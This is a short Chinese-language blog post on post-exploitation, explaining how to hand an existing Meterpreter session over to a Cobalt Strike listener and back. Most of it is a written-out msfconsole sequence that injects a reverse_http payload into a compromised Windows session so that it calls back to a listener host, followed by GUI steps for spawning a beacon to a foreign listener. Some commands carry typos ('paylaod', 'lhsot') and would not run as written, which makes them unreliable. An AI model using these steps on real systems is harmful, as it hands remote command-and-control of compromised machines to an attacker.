cs与meterpreter交互

作者: const27 分类: 内网,提权/后渗透 发布时间: 2020-09-04 06:53

shell传递

meterpreter shell 传递给cs

首先我们有一个meterpreter会话,想传递给cs。
那么第一步,cs上开启一个监听器(cs4.0)

192.168.64.133是本机的IP,接受从本机meterpreter传来的shell。
端口(c2)随便填一个
payload 设置为 beacon http
然后meterpreter执行以下步骤

msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject
set [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/payload_inject) > set paylaod windows/meterpreter/reverse_http
paylaod => windows/meterpreter/reverse_http  //因为cs监听器选择的payload是http,所以这里也选择http payload
msf5 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf5 exploit(windows/local/payload_inject) > set lhsot 192.168.64.133 
lhsot => 192.168.64.133
msf5 exploit(windows/local/payload_inject) > set lport 8080  //设置刚刚监听器设置的端口
lport => 8080
msf5 exploit(windows/local/payload_inject) > set session 3
session => 3
msf5 exploit(windows/local/payload_inject) > exploit

然后便是上线成功

cs shell传递给meterpreter

更简单了。
meterpreter照常开启监听,然后cs里启动一个监听器

选用foreign http payload,设置好host和port(meterpreter监听的port)

然后右键需要传递的shell-》spawn-》刚刚创好的监听器
传递成功

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

Leave a Reply

Your email address will not be published. Required fields are marked *

标签云